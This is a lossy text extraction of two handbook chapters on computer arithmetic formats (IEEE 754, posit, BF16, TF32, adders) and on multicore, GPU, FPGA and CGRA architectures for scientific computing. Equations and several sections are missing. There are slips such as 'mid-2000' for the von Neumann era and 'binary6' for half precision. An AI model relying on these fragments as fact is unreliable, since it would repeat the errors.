a challenging task due to the complexities involved in hardware designs.
The advances in technologies, backed by innovations, led to the performance
improvements in the sequential arithmetic circuits until the breakdown of
Moore’s law. There was significant progress in the meantime in the domain
of number representations to fit maximum information per bit. In the late
1990s and early 2000s, the inventions in energy and area efficient arithmetic
circuits flourished with growing application requirements. The three formats,
integer, fixed-point, and floating-point, became prominent based on application
requirements, and several approximation techniques were exercised in the rep-
resentations and across the representations. Post-2010, approximate computing
rose to prominence as several applications could withstand “enough” precision
and numerical accuracy of the arithmetic. While the approximate computing
completely undermined the reproducibility aspects of the arithmetic, rendering
high-performance gains, this chapter will discuss an overall overview of the
current state and future directions for computer arithmetic and arithmetic
architectures.
Keywords
Introduction
The quest for arithmetic research begun with mechanical computers, much before
the advent of digital computers. The early scientists developed mechanical calcula-
tors to perform basic arithmetic operations. Napier’s bones, Abacus, and Pascal’s
calculator are the examples. Meanwhile, the binary number system was extensively
studied in Europe by Thomas Harriot, Juan Caramuel y Lobkowitz, and Gottfried
Leibniz. However, the binary number system has its roots in multiple cultures
such as Egypt, China, and India. During the mid-2000, with the arrival of the von
Neumann model, the arithmetic hardware research gained momentum. A tentative
timeline of the developments is shown in Fig. 1.
Until 1970, computers used a “multiplier routine” to compute multiplications.
The multiplier routine is used to shift and accumulate the partial products. The first
computers that were enabled by the multiplication instruction were Motorola 6809
and Intel MCS-51 family. Later, Intel launched 8087, a floating-point coprocessor
compliant to x87 (also known as Numeric Processor eXtention – NPX) (Palmer
1980). The 8087 coprocessor, contained in a 40-pin DIP packaged chip, was
11 Computer Arithmetic 383
• High-level details of different arithmetic formats in the play ranging from integer
to some of the most recent ones
• Qualitative and quantitative comparison of the different arithmetic formats
Fig. 3 Die of the 8087 coprocessor chip highlighting the main components of the design (a) and
part of the constant ROM (b). (Figure source Ken Shirriff’s Blog 2021)
Definitions
Before delving into the arithmetic formats and their hardware implementation
details, it is advisable to understand a few definitions of computer arithmetic
formats, including the denotations associated with arithmetic efficiency in hardware.
Radix
Radix is defined as the base of the number system. The most prevalent radices are
binary (radix 2) and decimal (radix 10). The binary numbers are understandable
for the machines, and the human understanding of the binary numbers is limited.
As numbers get bigger, the possibility and capabilities for humans to decode the
numbers or perform any arithmetic on the number are little. The decimal numbers
386 F. Merchant et al.
are, on the other hand, easy to understand for humans. There are possibilities to
have numbers with another radix than 2 for the computers, especially with the
technologies that can support switching at multiple voltage levels. The discussion
on multivalued logic and digital circuit design for the multivalued logic is beyond
the scope of this exposition.
Positional Notation
Positional notation refers to the number representation system where each digit’s
position has a place value. The number is the sum of the products of each digit by
its place value. A generic string is given by
In positional notation, the radix is the base of the number system, and d ranges
from 0 to b − 1. To separate the positive (inclusive of 0) and negative exponent,
a radix point is used. The radix point concept is heavily emphasized in non-integer
number representations, especially in the number system containing fractional parts.
Absolute Error
Relative Error
Relative error is more reliable while comparing error in the measurements even at
a different scale. The relative error is obtained by normalizing the absolute error by
the correct value and is given by
absolute error
relative error = (2)
|correct value|
For the example of variables x and y in section “Absolute Error,” the relative
error in the computation of both the variables will be 0.1 and 0.01, respectively. A
relative error has two features that should be considered in practice: (i) relative error
11 Computer Arithmetic 387
is undefined if the correct value is zero, and (ii) relative error makes sense only if
the scale used has a true meaningful zero.
Numerical Precision
Unit is the last place (ULP) is defined as the minimum distance between the
two numbers in a computer system. ULP is used as a metric to identify the
trustworthiness of the computer system (Goldberg 1991).
Machine Epsilon
Integer Arithmetic
Unsigned integers can be captured in Eq. 1 by leaving out the digits with a negative
exponent. In that case, the digits of an integer can be given by
. . . d3 b3 + d2 b2 + d1 b1 + d0 b0 (3)
388 F. Merchant et al.
Gray Code
Gray code is also known as reflected binary code (RBC). In Gray code, two
successive numbers differ only by 1 bit. A 3-bit example of Gray code is:
The Gray codes were designed to overcome the physical limitation of the
binary number system. In the binary number system, the difference between two
consecutive numbers can be more than 1 bit, leading to the synchronization issue
while switching. For an N -bit binary number, the maximum difference between the
bits can range up to N − 1, while in Gray code it is always a 1-bit difference.
Due to non-simple arithmetic circuits, Gray codes have limited application.
Some of the prominent applications of Gray codes are position encoders, genetic
algorithms, error correction, Boolean circuit minimization, and arithmetic counters.
Gray codes have also found application in low-power computer architecture bus
design due to their switching characteristics.
Unary Code
Alternatively, ones can be replaced by zeros and vice versa without the loss of
generality. Unary coding has a significant disadvantage in that it is not amenable to
basic arithmetic operations, and hence the adoption of unary coding in mainstream
computing is undesired.
Fixed-Point Arithmetic
Fixed-point number format, as the name suggests, has a predefined position for
the radix point. Fixed-point numbers are useful in representing fractional values
and have a higher resolution as compared to integer numbers. Fixed-point numbers
follow integer.fraction format and are given by Eq. 1. The total number of digits in
a fixed-point number are #integer_digits + #fraction_digits + 1. An example of a
fixed-point number is 010.010 represents 2.5 in decimal (Fig. 4).
Floating-Point Arithmetic
Out of all the arithmetic formats, the floating-point formats are the most challenging
for hardware optimizations. A floating-point number is given by significand ×
baseexponent . The term “floating-point” refers to the fact that the radix-point position
is not fixed in the representation and depends on the value of the exponent. There
have been a variety of proposals in the literature for the implementations of the
floating-point formats. The most prominent is IEEE 754 format shown in Fig. 5 that
captures scale factor in the exponent field. All the formats are briefly covered in this
exposition.
IEEE 754
compliant number has three fields: sign, exponent, and fraction (see Fig. 5). Bias is
added to the exponent to represent very small and very large quantities. The value
of the bias depends on the size of the format.
The IEEE 754 standard defined five basic formats and interchange formats.
Table 1 summarized the formats covered in IEEE 754 standard. The decimal digits
are calculated by (#significand_digits × log10 base).
It has been nearly impossible to develop hardware arithmetic units that are fully
compliant to IEEE 754 standard (Nandy et al. 2010; Merchant et al. 2016). This is
mainly due to the complexities involved in the standard. The standard defines a few
special cases such as subnormal numbers, infinity, which makes the full hardware
implementations expensive, and hence, some of the functionality is implemented in
software. This approach results in performance energy penalties.
Subnormal Numbers
Formerly known as denormal numbers, the subnormal numbers are used to represent
the numbers that are not representable the minimum exponent size (expmin ). The
numbers that have less than expmin are then represented by shifting the mantissa to
the right. Also, the representation uses implicit zero instead of one. The phenomena
of approaching zero by right shifting the fractional part are referred to as gradual
underflow.
There are several performance-related issues in incorporating subnormal num-
bers. As per the study presented in Schwarz et al. (2003), the performance of
subnormal arithmetic when implemented entirely in hardware is comparable to that
of normal floating-point performance. This is due to hardware techniques employed
for the performance improvement. When implemented in software, the performance
of the arithmetic on subnormal numbers is significantly slower compared to the
performance of normal floating-point arithmetic. Researchers have also identified
that the slower speed can also create a timing channel and possible security
leak (Andrysco et al. 2015).
Exceptions
The IEEE 754 standard defines five exceptions. The exception flag is raised when
the exception occurs. Handling of the exceptions has been application-specific.
392 F. Merchant et al.
Quiet NaN
Quiet NaNs (qNaNs) propagate through the operations without generating any
exceptions. However, certain operations, such as format conversions and compar-
ison operations that cannot be performed on NaNs, generate exceptions.
Signaling NaN
Signaling NaNs (sNaNs) generates an exception and then quieted in the process if
appropriate. Handling sNaNs is a complex procedure.
In general, there have been several ambiguities in the handling of NaNs in a
program. Also, there has been confusion in the handling of qNaNs and sNaNs. In
the IEEE 754 standard, NaNs are encoded by all ones in the exponent bits and some
nonzero numbers in the fractional part, irrespective of the sign bit. If all the exponent
bits are ones and the fractional bits are zero, the bit pattern is regarded as infinity.
Infinity arises in arithmetic operations.
Rounding Modes
The IEEE 754 standard defines five rounding modes.
11 Computer Arithmetic 393
1. Round to nearest, ties to even: In this mode, the number is rounded to the nearest
number. If the number falls exactly between the two numbers, the number is
rounded to the nearest value with an even least significant digit.
2. Round to nearest, ties away from zero: In this mode, the number is rounded to the
nearest number. If the number falls midway, it is rounded up in case of a positive
number and rounded down in case of a negative number.
3. Round to zero: In this mode, the number is truncated.
4. Round to +∞: In this mode, the number is rounded up.
5. Round to −∞: In this mode, the number is rounded down.
Posit Arithmetic
Posit arithmetic is proposed as a drop-in replacement for the IEEE 754 compliant
arithmetic. It is claimed that the posit arithmetic format offers several absolute
advantages over its IEEE 754 compliant counterpart of the same size. An m-bit
posit number packs more information per bit compared to its IEEE 754 compliant
single-precision number where m can be any of the bit-width format supported by
the IEEE 754 standard. The posit format has only one exception called Not-a-Real
(NaR) (Fig. 6).
Since its inception in 2017 by John Gustafson (Gustafson and Yonemoto 2017),
there have been several studies on posit. Broadly, these studies can be classified as
hardware-based investigations and software-based analyses. In the hardware-based
implementations, there have been general-purpose parametric designs (Chaurasiya
et al. 2018) and application-specific designs (Nambi et al. 2020). The software and
application analyses are carried-out using either SoftPosit (Cerlane Leong 2018)
or Universal (Omzigt et al. 2018). A preliminary study of posits vis-à-vis floats
suggests that the numbers represented in posit format are more tolerant to single
and double bit-flips compared to their IEEE 754 compliant counterparts (Alouani
et al. 2021). In the case of bit-flips, the probability that a number will result in NaN
is much higher in floats compared to posits.
To facilitate hardware–software-arithmetic codesign, there have been a few posit
hardware implementations integrated into a RISC-V core. A qualitative comparison
of the implementations is shown in Table 2. The only implementation that supports
quire is Clarinet and posit custom instructions. The rest of the implementations
leverage the floating-point instructions for the posit hardware utilization.
One feature of posit is support for quire. The quire accumulator is a functionality
that can be implemented in software or hardware. The software libraries such as
SoftPosit (Cerlane Leong 2018) and Universal (Omzigt et al. 2018) support quire
in software, while Clarinet presented in Sharma et al. (2023) supports quire register
as a hardware feature. The format of quire register is shown in Fig. 7. The format
of the quire register is similar to the fixed-point format with carry-guard as an extra
field.
Other Formats
Since the inception of floating-point arithmetic, there have been a variety of number
format proposals in the literature. Here, some of them are covered.
BF16
The bfloat16 (BF16) format is the truncated version of IEEE 754 single-precision
floating-point format (see Fig. 8). The BF16 format was particularly designed to
accelerate machine learning, especially training, and near-sensor computing (Tagli-
avini et al. 2018).
The format retains 8 exponent bits of IEEE 754 single-precision format, while it
supports only 8-bit precision (7 fractional bits), resulting in reduced accuracy. The
BF16 format has a higher dynamic range and lower precision compared to half-
precision format (binary6). BF16 numbers are not usable for integer calculations.
Similar to IEEE 754 compliant formats, a lot of binary bit patterns (256) are
wasted in defining the NaN formats. Also, the BF16 format defines 2-bit patterns for
+∞ and −∞ and 2-bit patterns for +0 and −0. The precision of BF16 is between
two and three decimal digits.
Several vendors have adopted BF16 for their platforms. For example, Intel has
adopted it for its Nervana and FPGAs (Intel Unveils Nervana Neural Net L-1000
for accelerated AI training 2020). Other major vendors such as Google, ARM, and
AMD have also released products based on BF16 format.
TensorFlow-32
TensorFlow-32 (TF32) is the math mode introduced in NVidia A100 GPUs.
The core runs TF32 arithmetic that has 10 bits in fractional part and 8 bits in
exponent (HPC up to 20x TensorFloat-32 in the A100 GPU Accelerates AI Training
2020). The aim is to strike a balance to achieve performance and required accuracy
for machine learning training.
There have been other formats such as Microsoft Binary Format (MBF), mini-
float, and IBM Hexadecimal Floating Point (HFP) in the literature. However, with
the standardization of floating-point format, the IEEE 754 standard implementations
were preferred over other formats, except for machine learning applications, where
customized formats are more popular.
Hardware Implementations
Adders
Ripple-Carry Adder
To add two N -bit numbers, multiple full-adders can be cascaded where carry ripples
through these adders (see Fig. 10). Cin of each adder is Cout of the previous adder.
The first full-adder can be replaced by a half-adder in a ripple-carry adder assuming
that Cin for the N -bit adder is 0. Ripple-carry adder is generally slow since each
full-adder requires carry input to process the operation. This forms a critical path
in the adder. Furthermore, each full-adder requires three levels of logic (see Fig. 9
(right)).
11 Computer Arithmetic 397
Fig. 9 Binary half- (left) and full-adders (right) and their respective truth tables
Carry-Lookahead Adder
A carry-lookahead adder (CLA) overcomes the performance issue in the ripple-
carry adder by processing the carry bit faster. The CLA computes one or more carry
bits before the sum, which reduces the wait time for the carry bits, resulting in faster
addition. Konrad Zuse implemented the first CLA (Rojas 2014). Kogge–Stone adder
(KSA) and Brent–Kung adder (BKA) are the types of CLA (Fig. 11).
Multipliers
Multiplier plays a key role in an arithmetic logic unit (ALU) of a central process-
ing unit (CPU). The early implementations of multipliers were software-based,
using adder circuits; however, with the advent of hardware–software codesign
techniques, more sophisticated hardware blocks were established. This resulted in
398 F. Merchant et al.
Dividers
Square Root
Conclusion
been several proposals in the literature for different formats, and standardization
efforts have been made to ensure uniformity and reproducibility. Especially for
the floating-point arithmetic, the efforts have been significant due to the floating-
point architectures’ hardware complexities. Later, the computer architects diverged
to more optimized arithmetic formats suitable for the applications. Several new
formats were invented, such as TF32, posit, and bfloat16, that are envisioned for
replacement of IEEE 754 compliant formats. Hardware design for these new formats
has been challenging since the applications areas such as edge computing require
extremely small area and energy footprints. Also, with the advancements in the
technologies, with the arrival of post-CMOS technologies in the offing, there are
several research opportunities in identifying the right format that fits the novel
technologies.
References
Alouani I, Ben Khalifa A, Merchant F, Leupers R (2021) An investigation on inherent robustness of
posit data representation. In: Proceedings of the international conference on vlsi design (VLSID)
Andrysco M, Kohlbrenner D, Mowery K, Jhala R, Lerner S, Shacham H (2015) On subnormal
floating point and abnormal timing. In: 2015 IEEE symposium on security and privacy, pp 623–
639
Calligo Technologies (2020) Posit Numeric Unit (PNU-IP). https://calligotech.com/posit-numeric-
unit-pnu-ip/. Accessed 17 Dec 2020
Cerlane Leong (2018) Softposit version 0.4.1rc
Chaurasiya R, Gustafson J, Shrestha R, Neudorfer J, Nambiar S, Niyogi K, Merchant F, Leupers
R (2018) Parameterized posit arithmetic hardware generator. In: 2018 IEEE 36th International
conference on computer design (ICCD), pp 334–341
Garner HL (1976) A survey of some recent contributions to computer arithmetic. IEEE Trans
Comput C-25(12):1277–1282
Goldberg D (1991) What every computer scientist should know about floating-point arithmetic.
ACM Comput Surv 23(1):5–48 (1991)
Guntoro A, De La Parra C, Merchant F, De Dinechin F, Gustafson JL, Langhammer M, Leupers R,
Nambiar S (2020) Next generation arithmetic for edge computing. In: 2020 Design, automation
test in Europe conference exhibition (DATE), pp 1357–1365
Gustafson JL, Yonemoto I (2017) Beating floating point at its own game: posit arithmetic.
Supercomput Front Innov Int J 4(2):71–86
Hasnat A, Bhattacharyya T, Dey A, Halder S, Bhattacharjee D (2017) A fast FPGA based
architecture for computation of square root and inverse square root. In: 2017 Devices for
integrated circuit (DevIC), pp 383–387
Hemmert KS, Underwood KD (2007) Floating-point divider design for FPGAs. IEEE Trans Very
Large Scale Integr VLSI Syst 15(1):115–118
HPC up to 20x TensorFloat-32 in the A100 GPU Accelerates AI Training (2020) https://blogs.
nvidia.com/blog/2020/05/14/tensorfloat-32-precision-format/. Accessed 17 Dec 2020
IEEE Standard for Binary Floating-Point Arithmetic (1985) ANSI/IEEE Std 754-1985, pp 1–20
IEEE Standard for Floating-Point Arithmetic (2008) IEEE Std 754-2008, pp 1–70
IEEE Standard for Floating-Point Arithmetic (2019) IEEE Std 754-2019 (Revision of IEEE 754-
2008), pp 1–84
IEEE Standard for Radix-Independent Floating-Point Arithmetic (1987) ANSI/IEEE Std 854-
1987, pp 1–19
Intel (2021) 8087 Math Coprocessor. http://pdf.datasheetcatalog.com/datasheets/2300/45014_DS.
pdf. Accessed 22 Jan 2021
400 F. Merchant et al.
Intel Unveils Nervana Neural Net L-1000 for Accelerated AI Training (2020) https://venturebeat.
com/2018/05/23/intel-unveils-nervana-neural-net-l-1000-for-accelerated-ai-training/. Accessed
17 Dec 2020
Ken Shirriff’s Blog (2021) 8087 Math Coprocessor Die. http://www.righto.com/2020/05/
extracting-rom-constants-from-8087-math.html. Accessed 22 Jan 2021.
Liu W, Lombardi F, Shulte M (2020) A retrospective and prospective view of approximate
computing [point of view. Proc IEEE 108(3):394–399
Marasa JD, Matula DW (1973) A simulative study of correlated error propagation in various finite-
precision arithmetics. IEEE Trans Comput C-22(6):587–597
Merchant F, Choudhary N, Nandy SK, Narayan R (2016) Efficient realization of table look-up
based double precision floating point arithmetic. In: 2016 29th International conference on VLSI
design and 2016 15th International conference on embedded systems (VLSID), pp 415–420
Mopuri S, Acharyya A (2017) Low-complexity methodology for complex square-root computa-
tion. IEEE Trans Very Large Scale Integr VLSI Syst 25(11):3255–3259
Muller J-M, Brunie N, de Dinechin F, Jeannerod C-P, Joldes M, Lefèvre V, Melquiond G, Revol
N, Torres S (2018) Handbook of floating-point arithmetic, 2nd edn. Springer
Nambi S, Ullah S, Lohana A, Satyendra Sahoo S, Merchant F, Kumar A (2020) Expan(n)d:
Exploring posits for efficient artificial neural network design in FPGA-based systems
Nandy S, Balakrishnan S, Merchant F, Baluni A (2010) A fully pipelined modular multiple
precision floating point multiplier with vector support. In: 2010 International symposium on
electronic system design, Los Alamitos, Dec 2011. IEEE Computer Society, pp 45–50
Obermann SF, Flynn MJ (1997) Division algorithms and implementations. IEEE Trans Comput
46(8):833–854
Omzigt T (2018) Universal: a header-only C++ template library for universal number arithmetic
Palmer JF (1980) The Intel 8087 numeric data processor. In: International workshop on managing
requirements knowledge, Los Alamitos. IEEE Computer Society, p 887
Rojas R (2014) The Z1: architecture and algorithms of Konrad Zuse’s first computer. CoRR,
abs/1406.1886
Saxena V, Merchant F, Reddy A, Gustafson JL, Jonathan N, Sangeeth N, Leupers R (2021)
Brightening the optical flow through posit arithmetic. In: International symposium on quality
electronic design (ISQED)
Schwarz EM, Schmookler M, Trong SD (2003) Hardware implementations of denormalized
numbers. In: Proceedings 2003 16th IEEE symposium on computer arithmetic, pp 70–78
Sharma NN, Jain R, Pokkuluri MM, Patkar SB, Leupers R, Nikhil RS, Merchant F (2023)
Clarinet: a quire-enabled RISC-V-based framework for posit arithmetic empiricism. J Syst
Archit 135:102801
Swartzlander EE, Alexopoulos AG (1975) The sign/logarithm number system. IEEE Trans Comput
C-24(12):1238–1242
Tagliavini G, Mach S, Rossi D, Marongiu A, Benin L (2018) A transprecision floating-point
platform for ultra-low power computing. In: 2018 Design, automation test in Europe conference
exhibition (DATE), pp 1051–1056
ThoughtWorks (2020) Posit Enhanced Rocket Chip (PERC). https://www.thoughtworks.com/
engineering-research/perc. Accessed 17 Dec 2020
Tiwari S, Gala N, Rebeiro C, Kamakoti V (2019) PERI: a posit enabled RISC-V core, pp 1–14
Ugurdag HF, de Dinechin F, Gener YS, Gören S, Didier L-S (2017) Hardware division by small
integer constants. IEEE Trans Comput 66(12):2097–2110
Architectures for Scientific Computing
12
Farhad Merchant
Contents
Introduction . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 402
Definitions . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 403
Scientific Computing . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 403
Multicore Architectures . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 404
Manycore Architectures . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 405
Field-Programmable Gate Arrays . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 405
Coarse-Grained Reconfigurable Architectures . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 405
Custom Architectures . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 407
Multicore Architectures . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 407
General Purpose Graphics Processing Units . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 408
Field-Programmable Gate Arrays . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 410
Coarse-Grained Reconfigurable Architectures . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 410
Conclusion . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 412
References . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 412
Abstract
F. Merchant ()
University of Groningen, Groningen, The Netherlands
e-mail: [email protected]
Keywords
Introduction
Definitions
To understand the concepts better, a few fundamental definitions are delved into in
the following section.
Scientific Computing
Multicore Architectures
Manycore Architectures
Manycore processors are a class of multicore processors where the processor cores
are simplified. The cores are mostly small, with minimal control circuits and small
local memories. A host computer is required to schedule computations on manycore
architecture. The manycore processor architectures offer a higher degree of explicit
parallelism (see Fig. 3). The scientific computing code then exploits this parallelism.
Manycore processors do not have concepts such as message passing, direct memory
access, partitioned global address spaces, and noncoherent caches. GPUs are one
example of manycore processors.
Fig. 5 A generic coarse-grained reconfigurable architecture with function units and network-on-
chip
Custom Architectures
Custom integrated circuits are less preferred as a computing substrate for scientific
computing due to the lack of flexibility. However, tailored designs, together with
reprogrammable /reconfigurable fabric, are used to accelerate the target scientific
computing workloads. One such example is CGRAs.
Multicore Architectures
Graphics processing units (GPUs) are a class of manycore architectures. GPUs were
originally developed for graphics processing, especially shaders, while applications
were executed on a central processing unit (also known as a host machine). The
advent of GPUs dates back to the 1970s–1980s when the target application was
video games. Originally, shading languages were used to program GPUs. In a
typical CPU-GPU architecture, GPUs were external, connected to the CPU through
a bus such as PCI Express (see Fig. 7). Initial GPUs did not support floating-point
arithmetic.
In early 2001, general-purpose computing became popular on GPUs. This
was due to the improved programmable shaders and support for floating-point
arithmetic on GPUs. It was observed that the GPUs are suitable for applications
that involve matrix computations (Krüger and Westermann 2003; Bolz et al. 2003).
Historically, GPUs were programmed using OpenGL or DirectX. Both these provide
application programming interfaces to write application code. However, both appli-
cation programming interfaces are targeted for graphics, and hence programming
for general purpose computing became cumbersome with these interfaces as it
required the knowledge of graphical concepts. Later, the advent of computer-unified
device architecture (CUDA) allowed programmers to ignore the graphical concepts.
Thus, a programmer could think of high-performance computing concepts while
programming GPUs. In the following, some of the concepts of GPUs that assist in
scientific computing are described.
Arithmetic format support GPUs targeted for graphics processing mostly sup-
ported integer arithmetic ranging from 8 bits to 32 bits. However, repurposing
GPUs for scientific computing required them to support the floating-point format as
most of the scientific applications required 32 or 64-bit floating-point computations.
Incorporating high-precision floating-point hardware on GPUs gave rise to the trade-
off between accuracy and performance, two contrasting goals that are extremely
important for scientific computing.
Vectorization Since most GPUs were repurposed for applications that consist
of matrix computations, vectorization support became obvious. This gave rise to
concepts related to single-instruction multiple data (SIMD) support on GPUs.
Fig. 7 CPU-GPU
(heterogeneous) architecture
12 Architectures for Scientific Computing 409
Caches Traditionally, GPUs that were used for graphics processing did not require
caches. This was mainly due to the GPU processing data being rendered on the
display. However, once the GPUs were repurposed for general-purpose computing,
the need for caches became apparent as data locality became critical.
Register files Most state-of-the-art GPUs support large register files due to vector-
ization. Besides, the large register files reduce the context switching latency.
is divided into tasks of varying granularity. These tasks are then scheduled on
the heterogeneous system statically or dynamically. Nonparallelizable tasks are
executed on the CPU. The parallelizable tasks that are in the form of Level-2
or Level-3 BLASs are scheduled on GPUs. MAGMA is a high-performance
architecture and supports various formats such as single precision (S), double
precision (D), single-precision complex numbers (C), and double-precision complex
numbers (Z).
CUBLAS is a CUDA-accelerated API developed by NVIDIA that supports
Level-1 (vector–vector), Level-2 (matrix–vector), and Level-3 (matrix–matrix)
operations. The CUBLAS library is highly optimized for NVIDIA GPUs.
Classical computing platforms such as multicore and GPUs are capable of exploit-
ing coarse-grained parallelism in scientific computing workloads. FPGAs are
capable of exploiting fine-grained and coarse-grained parallelism. Furthermore,
FPGAs offer unique advantages compared to CPUs and GPUs (Kestur et al. 2010).
These advantages are low latency, high performance, and superior energy efficiency.
On the other hand, there are a few challenges involved while implementing a
scientific computing application on an FPGA. These challenges are as follows:
• High specification to deployment time: This is mainly due to the amount of time
required to program FPGAs using hardware description languages.
• Hardware debugging: Since the designs are implemented in the form of hardware
description languages, the debugging becomes tedious. Many FPGA vendors do
not have the required support for debugging designs on FPGAs. This results in
trial-and-error-based methods, consuming a great amount of time.
• Limited resources: Often, the amount of FPGA resources is not sufficient to
implement the entire design on an FPGA. This results in using an FPGA cluster,
which impacts the performance or requires a complex data scheduling mecha-
nism to reuse the resources, again having a similar performance bottleneck.
In the recent years, there are C and OpenCL-based front ends provided to
program FPGAs apart from hardware description languages-based front ends. This
has resulted in a great popularity among FPGA enthusiasts for using FPGAs for
high-performance scientific codes (De Matteis et al. 2020).
CGRAs offer a unique balance between flexibility and performance. They occupy
the middle ground between fixed-function custom integrated circuits and fully
programmable/reconfigurable architectures such as multicores or FPGAs. For this
reason, CGRAs have become popular for embedded and scientific computing
12 Architectures for Scientific Computing 411
Fig. 9 4 × 4 matrix scheduling on systolic array for classical and column-wise Givens rotation.
(Reproduced from Merchant et al. 2014)
applications. Another major advantage the CGRAs have is their array-like structure,
making them highly suitable for matrix computations (Tan et al. 2022) (see Fig. 9).
Especially, CGRAs are amenable to systolic scheduling as suggested by the
authors in Merchant et al. (2014), Rákossy et al. (2014b), and Mahadurkar et al.
(2014). Despite the promises in CGRAs for scientific computing applications, large-
scale deployment remains a challenge. These challenges are as follows:
412 F. Merchant
Due to the many of the above challenges, the adoption of CGRAs remains limited
for scientific applications. On the other hand, many CGRA-like architectures are
adopted in embedded computing due to deterministic and constrained workloads.
Conclusion
References
Anderson E, Bai Z, Bischof C, Blackford S, Demmel J, Dongarra J, Du Croz J, Greenbaum A,
Hammarling S, McKenney A, Sorensen D (1999) LAPACK users’ guide, 3rd edn. SIAM,
Philadelphia
Anderson J, Beidas R, Chacko V, Hsiao H, Ling X, Ragheb O, Wang X, Yu T (2021) CGRA-
ME: an open-source framework for CGRA architecture and cad research: (invited paper). In:
2021 IEEE 32nd international conference on application-specific systems, architectures and
processors (ASAP), pp 156–162
Asanovic K, Bodik R, Demmel J, Keaveny T, Keutzer K, Kubiatowicz J, Morgan N, Patterson D,
Sen K, Wawrzynek J, Wessel D, Yelick K (2009) A view of the parallel computing landscape.
Commun ACM 52(10):56–67
12 Architectures for Scientific Computing 413
Bates PD, Lane SN, Ferguson RI (2005) Computational fluid dynamics: applications in environ-
mental hydraulics. Wiley, New York
Blackford LS, Choi J, Cleary A, D’Azeuedo E, Demmel J, Dhillon I, Hammarling S, Henry G,
Petitet A, Stanley K, Walker D, Whaley RC, Dongarra JJ (1997) ScaLAPACK user’s guide.
Society for Industrial and Applied Mathematics, Philadelphia
Bohr M (2007) A 30 year retrospective on Dennard’s MOSFET scaling paper. IEEE Solid-State
Circuits Soc Newsl 12(1):11–13
Bolz J, Farmer I, Grinspun E, Schröder P (2003) Sparse matrix solvers on the GPU: conjugate
gradients and multigrid. ACM Trans Graph 22(3):917–924
Cong J, Huang H, Ma C, Xiao B, Zhou P (2014) A fully pipelined and dynamically com-
posable architecture of CGRA. In: 2014 IEEE 22nd annual international symposium on
field-programmable custom computing machines, pp 9–16
Dai G, Huang T, Chi Y, Xu N, Wang Y, Yang H (2017) ForeGraph: exploring large-scale graph
processing on multi-FPGA architecture. In: Proceedings of the 2017 ACM/SIGDA international
symposium on field-programmable gate arrays, FPGA’17. Association for Computing Machin-
ery, New York, pp 217–226
Das S, Madhu K, Krishna M, Sivanandan N, Merchant F, Natarajan S, Biswas I, Pulli A, Nandy SK,
Narayan R (2014) A framework for post-silicon realization of arbitrary instruction extensions
on reconfigurable data-paths. J Syst Archit 60(7):592–614
Dongarra J, Gates M, Haidar A, Kurzak J, Luszczek P, Wu P, Yamazaki I, Yarkhan A, Abalenkovs
M, Bagherpour N, Hammarling S, Šístek J, Stevens D, Zounon M, Relton SD (2019)
Plasma: parallel linear algebra software for multicore using OpenMP. ACM Trans Math Softw
45(2):16:1–16:35
Dongarra JJ, Luszczek P (2011) PLASMA. In: Padua DA (ed) Encyclopedia of parallel computing.
Springer, pp 1568–1570
Goetting E, Schultz D, Parlour D, Frake S, Carpenter R, Abellera C, Leone B, Marquez D,
Palczewski M, Wolsheimer E, Hart M, Look K, Voogel M, West G, Tong V, Chang A, Chung
D, Hsieh W, Farrell L, Carter W (1995) A sea-of-gates FPGA. In: Proceedings ISSCC ’95 –
international solid-state circuits conference, pp 110–111
Higham NJ (1993) Handbook of writing for the mathematical sciences. SIAM, Philadelphia
Jaiyeoba W, Elyasi N, Choi C, Skadron K (2023) Acts: a near-memory FPGA graph processing
framework. In: Proceedings of the 2023 ACM/SIGDA international symposium on field
programmable gate arrays, FPGA’23. Association for Computing Machinery, New York,
pp 79–89
Kestur S, Davis JD, Williams O (2010) Blas comparison on FPGA, CPU and GPU. In: 2010 IEEE
computer society annual symposium on VLSI, pp 288–293
Krüger J, Westermann R (2003) Linear algebra operators for GPU implementation of numerical
algorithms. ACM Trans Graph 22(3):908–916
Mahadurkar M, Merchant F, Maity A, Vatwani K, Munje I, Gopalan N, Nandy SK, Narayan R
(2014) Co-exploration of NLA kernels and specification of compute elements in distributed
memory CGRAs. In: XIVth international conference on embedded computer systems: architec-
tures, modeling, and simulation, SAMOS 2014, Agios Konstantinos, Samos, 14–17 July 2014.
IEEE, pp 225–232
De Matteis T, de Fine Licht J, Hoefler T (2020) FBLAS: streaming linear algebra on FPGA.
In: SC20: international conference for high performance computing, networking, storage and
analysis, pp 1–13
Merchant F, Chattopadhyay A, Garga G, Nandy SK, Narayan R, Gopalan N (2014) Efficient
QR decomposition using low complexity column-wise givens rotation (CGR). In: 2014 27th
international conference on VLSI design, VLSID 2014, and 2014 13th international conference
on embedded systems, Mumbai, 5–9 Jan 2014. IEEE Computer Society, pp 258–263
Merchant F, Maity A, Mahadurkar M, Vatwani K, Munje I, Madhava Krishna C, Sivanandan
N, Gopalan N, Raha S, Nandy SK, Narayan R (2015) Micro-architectural enhancements in
distributed memory CGRAs for LU and QR factorizations. In: 28th International Conference
